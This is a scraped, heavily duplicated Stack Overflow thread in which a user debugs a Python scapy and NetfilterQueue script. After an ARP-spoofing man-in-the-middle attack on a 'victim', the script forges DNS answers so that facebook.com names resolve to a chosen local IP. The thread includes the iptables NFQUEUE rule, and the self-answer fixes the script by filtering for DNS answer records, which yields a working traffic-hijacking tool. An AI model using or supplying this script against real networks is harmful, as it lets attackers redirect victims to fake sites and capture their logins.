Python dns spoofing dont work nome not resolved
up vote
2
down vote
favorite
i don't know why mi script don't work, the victim browser shows : ERR: named not resolved.
My script
from scapy.all import *
from netfilterqueue import NetfilterQueue
spoofDomain = 'www.facebook.com'
spoofResolvedIp = '172.16.16.162'
queueId = 1
def dnsSpoof(packet):
originalPayload = IP( packet.get_payload() )
if not originalPayload.haslayer(DNSQR):
# Not a dns query, accept and go on
packet.accept()
else:
if ("m.facebook.com" in originalPayload[DNS].qd.qname) or ("facebook.com" in originalPayload[DNS].qd.qname) or ("www.facebook.com" in originalPayload[DNS].qd.qname) or ("edge-chat.facebook.com" in originalPayload[DNS].qd.qname):
print "Intercepted DNS request for " + spoofDomain + ": " + originalPayload.summary()
# Build the spoofed response
spoofedPayload = IP(dst=originalPayload[IP].dst, src=originalPayload[IP].src)/
UDP(dport=originalPayload[UDP].dport, sport=originalPayload[UDP].sport)/
DNS(id=originalPayload[DNS].id, qr=1, aa=1, qd=originalPayload[DNS].qd,
an=DNSRR(rrname=originalPayload[DNS].qd.qname, ttl=10, rdata=spoofResolvedIp))
print "Spoofing DNS response to: " + spoofedPayload.summary()
packet.set_payload(str(spoofedPayload))
packet.accept()
print "------------------------------------------"
else:
# DNS query but not for target spoofDomain, accept and go on
packet.accept()
# bind the callback function to the queue
nfqueue = NetfilterQueue()
nfqueue.bind(queueId, dnsSpoof)
# wait for packets
try:
nfqueue.run()
except KeyboardInterrupt:
print('')
nfqueue.unbind()
I use iptables -t mangle -I FORWARD -p udp -j NFQUEUE --queue-num 1 command.
Firs i perform a man in the middle attack by ARP Cache spoofing. I used wireshark to see the traffic and it seems to be ok, I don't know whats is going on.
python dns scapy arp
asked Nov 11 at 4:54
Joako Itria
112
add a comment |
up vote
2
down vote
favorite
i don't know why mi script don't work, the victim browser shows : ERR: named not resolved.
My script
from scapy.all import *
from netfilterqueue import NetfilterQueue
spoofDomain = 'www.facebook.com'
spoofResolvedIp = '172.16.16.162'
queueId = 1
def dnsSpoof(packet):
originalPayload = IP( packet.get_payload() )
if not originalPayload.haslayer(DNSQR):
# Not a dns query, accept and go on
packet.accept()
else:
if ("m.facebook.com" in originalPayload[DNS].qd.qname) or ("facebook.com" in originalPayload[DNS].qd.qname) or ("www.facebook.com" in originalPayload[DNS].qd.qname) or ("edge-chat.facebook.com" in originalPayload[DNS].qd.qname):
print "Intercepted DNS request for " + spoofDomain + ": " + originalPayload.summary()
# Build the spoofed response
spoofedPayload = IP(dst=originalPayload[IP].dst, src=originalPayload[IP].src)/
UDP(dport=originalPayload[UDP].dport, sport=originalPayload[UDP].sport)/
DNS(id=originalPayload[DNS].id, qr=1, aa=1, qd=originalPayload[DNS].qd,
an=DNSRR(rrname=originalPayload[DNS].qd.qname, ttl=10, rdata=spoofResolvedIp))
print "Spoofing DNS response to: " + spoofedPayload.summary()
packet.set_payload(str(spoofedPayload))
packet.accept()
print "------------------------------------------"
else:
# DNS query but not for target spoofDomain, accept and go on
packet.accept()
# bind the callback function to the queue
nfqueue = NetfilterQueue()
nfqueue.bind(queueId, dnsSpoof)
# wait for packets
try:
nfqueue.run()
except KeyboardInterrupt:
print('')
nfqueue.unbind()
I use iptables -t mangle -I FORWARD -p udp -j NFQUEUE --queue-num 1 command.
Firs i perform a man in the middle attack by ARP Cache spoofing. I used wireshark to see the traffic and it seems to be ok, I don't know whats is going on.
python dns scapy arp
asked Nov 11 at 4:54
Joako Itria
112
Hi ! Welcome to stackoverflow. Posting big scripts and asking for a wide unknown bug isn’t very attractive.. you should try to investigate first, show wireshark screenshots of what’s happening, logs... so that your issue is easier to help with
– Cukic0d
Nov 11 at 14:19
add a comment |
up vote
2
down vote
favorite
up vote
2
down vote
favorite
i don't know why mi script don't work, the victim browser shows : ERR: named not resolved.
My script
from scapy.all import *
from netfilterqueue import NetfilterQueue
spoofDomain = 'www.facebook.com'
spoofResolvedIp = '172.16.16.162'
queueId = 1
def dnsSpoof(packet):
originalPayload = IP( packet.get_payload() )
if not originalPayload.haslayer(DNSQR):
# Not a dns query, accept and go on
packet.accept()
else:
if ("m.facebook.com" in originalPayload[DNS].qd.qname) or ("facebook.com" in originalPayload[DNS].qd.qname) or ("www.facebook.com" in originalPayload[DNS].qd.qname) or ("edge-chat.facebook.com" in originalPayload[DNS].qd.qname):
print "Intercepted DNS request for " + spoofDomain + ": " + originalPayload.summary()
# Build the spoofed response
spoofedPayload = IP(dst=originalPayload[IP].dst, src=originalPayload[IP].src)/
UDP(dport=originalPayload[UDP].dport, sport=originalPayload[UDP].sport)/
DNS(id=originalPayload[DNS].id, qr=1, aa=1, qd=originalPayload[DNS].qd,
an=DNSRR(rrname=originalPayload[DNS].qd.qname, ttl=10, rdata=spoofResolvedIp))
print "Spoofing DNS response to: " + spoofedPayload.summary()
packet.set_payload(str(spoofedPayload))
packet.accept()
print "------------------------------------------"
else:
# DNS query but not for target spoofDomain, accept and go on
packet.accept()
# bind the callback function to the queue
nfqueue = NetfilterQueue()
nfqueue.bind(queueId, dnsSpoof)
# wait for packets
try:
nfqueue.run()
except KeyboardInterrupt:
print('')
nfqueue.unbind()
I use iptables -t mangle -I FORWARD -p udp -j NFQUEUE --queue-num 1 command.
Firs i perform a man in the middle attack by ARP Cache spoofing. I used wireshark to see the traffic and it seems to be ok, I don't know whats is going on.
python dns scapy arp
asked Nov 11 at 4:54
Joako Itria
112
i don't know why mi script don't work, the victim browser shows : ERR: named not resolved.
My script
from scapy.all import *
from netfilterqueue import NetfilterQueue
spoofDomain = 'www.facebook.com'
spoofResolvedIp = '172.16.16.162'
queueId = 1
def dnsSpoof(packet):
originalPayload = IP( packet.get_payload() )
if not originalPayload.haslayer(DNSQR):
# Not a dns query, accept and go on
packet.accept()
else:
if ("m.facebook.com" in originalPayload[DNS].qd.qname) or ("facebook.com" in originalPayload[DNS].qd.qname) or ("www.facebook.com" in originalPayload[DNS].qd.qname) or ("edge-chat.facebook.com" in originalPayload[DNS].qd.qname):
print "Intercepted DNS request for " + spoofDomain + ": " + originalPayload.summary()
# Build the spoofed response
spoofedPayload = IP(dst=originalPayload[IP].dst, src=originalPayload[IP].src)/
UDP(dport=originalPayload[UDP].dport, sport=originalPayload[UDP].sport)/
DNS(id=originalPayload[DNS].id, qr=1, aa=1, qd=originalPayload[DNS].qd,
an=DNSRR(rrname=originalPayload[DNS].qd.qname, ttl=10, rdata=spoofResolvedIp))
print "Spoofing DNS response to: " + spoofedPayload.summary()
packet.set_payload(str(spoofedPayload))
packet.accept()
print "------------------------------------------"
else:
# DNS query but not for target spoofDomain, accept and go on
packet.accept()
# bind the callback function to the queue
nfqueue = NetfilterQueue()
nfqueue.bind(queueId, dnsSpoof)
# wait for packets
try:
nfqueue.run()
except KeyboardInterrupt:
print('')
nfqueue.unbind()
I use iptables -t mangle -I FORWARD -p udp -j NFQUEUE --queue-num 1 command.
Firs i perform a man in the middle attack by ARP Cache spoofing. I used wireshark to see the traffic and it seems to be ok, I don't know whats is going on.
python dns scapy arp
python dns scapy arp
asked Nov 11 at 4:54
Joako Itria
112
asked Nov 11 at 4:54
Joako Itria
112
asked Nov 11 at 4:54
Joako Itria
112
asked Nov 11 at 4:54
Joako Itria
112
asked Nov 11 at 4:54
Joako Itria
112
112
Hi ! Welcome to stackoverflow. Posting big scripts and asking for a wide unknown bug isn’t very attractive.. you should try to investigate first, show wireshark screenshots of what’s happening, logs... so that your issue is easier to help with
– Cukic0d
Nov 11 at 14:19
add a comment |
Hi ! Welcome to stackoverflow. Posting big scripts and asking for a wide unknown bug isn’t very attractive.. you should try to investigate first, show wireshark screenshots of what’s happening, logs... so that your issue is easier to help with
– Cukic0d
Nov 11 at 14:19
Hi ! Welcome to stackoverflow. Posting big scripts and asking for a wide unknown bug isn’t very attractive.. you should try to investigate first, show wireshark screenshots of what’s happening, logs... so that your issue is easier to help with
– Cukic0d
Nov 11 at 14:19
Hi ! Welcome to stackoverflow. Posting big scripts and asking for a wide unknown bug isn’t very attractive.. you should try to investigate first, show wireshark screenshots of what’s happening, logs... so that your issue is easier to help with
– Cukic0d
Nov 11 at 14:19
add a comment |
1 Answer
1
active
oldest
votes
up vote
0
down vote
I solved the problem, I was looking for queries I don't see that sorry
if not originalPayload.haslayer(DNSQR)
DNSQR is dns query, and I want to take dns answers, so the code is that:
if not originalPayload.haslayer(DNSRR)
edited Nov 16 at 5:56
marc_s
566k12610931245
answered Nov 16 at 3:06
Joako Itria
112
add a comment |
1 Answer
1
active
oldest
votes
1 Answer
1
active
oldest
votes
active
oldest
votes
active
oldest
votes
up vote
0
down vote
I solved the problem, I was looking for queries I don't see that sorry
if not originalPayload.haslayer(DNSQR)
DNSQR is dns query, and I want to take dns answers, so the code is that:
if not originalPayload.haslayer(DNSRR)
edited Nov 16 at 5:56
marc_s
566k12610931245
answered Nov 16 at 3:06
Joako Itria
112
add a comment |
up vote
0
down vote
I solved the problem, I was looking for queries I don't see that sorry
if not originalPayload.haslayer(DNSQR)
DNSQR is dns query, and I want to take dns answers, so the code is that:
if not originalPayload.haslayer(DNSRR)
edited Nov 16 at 5:56
marc_s
566k12610931245
answered Nov 16 at 3:06
Joako Itria
112
add a comment |
up vote
0
down vote
up vote
0
down vote
I solved the problem, I was looking for queries I don't see that sorry
if not originalPayload.haslayer(DNSQR)
DNSQR is dns query, and I want to take dns answers, so the code is that:
if not originalPayload.haslayer(DNSRR)
edited Nov 16 at 5:56
marc_s
566k12610931245
answered Nov 16 at 3:06
Joako Itria
112
I solved the problem, I was looking for queries I don't see that sorry
if not originalPayload.haslayer(DNSQR)
DNSQR is dns query, and I want to take dns answers, so the code is that:
if not originalPayload.haslayer(DNSRR)
edited Nov 16 at 5:56
marc_s
566k12610931245
answered Nov 16 at 3:06
Joako Itria
112
edited Nov 16 at 5:56
marc_s
566k12610931245
edited Nov 16 at 5:56
marc_s
566k12610931245
edited Nov 16 at 5:56
marc_s
566k12610931245
566k12610931245
answered Nov 16 at 3:06
Joako Itria
112
answered Nov 16 at 3:06
Joako Itria
112
answered Nov 16 at 3:06
Joako Itria
112
112
add a comment |
add a comment |
draft saved
draft discarded
draft saved
draft discarded
Sign up or log in
StackExchange.ready(function () {
StackExchange.helpers.onClickDraftSave('#login-link');
});
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
StackExchange.ready(
function () {
StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fstackoverflow.com%2fquestions%2f53245958%2fpython-dns-spoofing-dont-work-nome-not-resolved%23new-answer', 'question_page');
}
);
Post as a guest
Required, but never shown
Sign up or log in
StackExchange.ready(function () {
StackExchange.helpers.onClickDraftSave('#login-link');
});
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
Sign up or log in
StackExchange.ready(function () {
StackExchange.helpers.onClickDraftSave('#login-link');
});
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
Sign up or log in
StackExchange.ready(function () {
StackExchange.helpers.onClickDraftSave('#login-link');
});
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Hi ! Welcome to stackoverflow. Posting big scripts and asking for a wide unknown bug isn’t very attractive.. you should try to investigate first, show wireshark screenshots of what’s happening, logs... so that your issue is easier to help with
– Cukic0d
Nov 11 at 14:19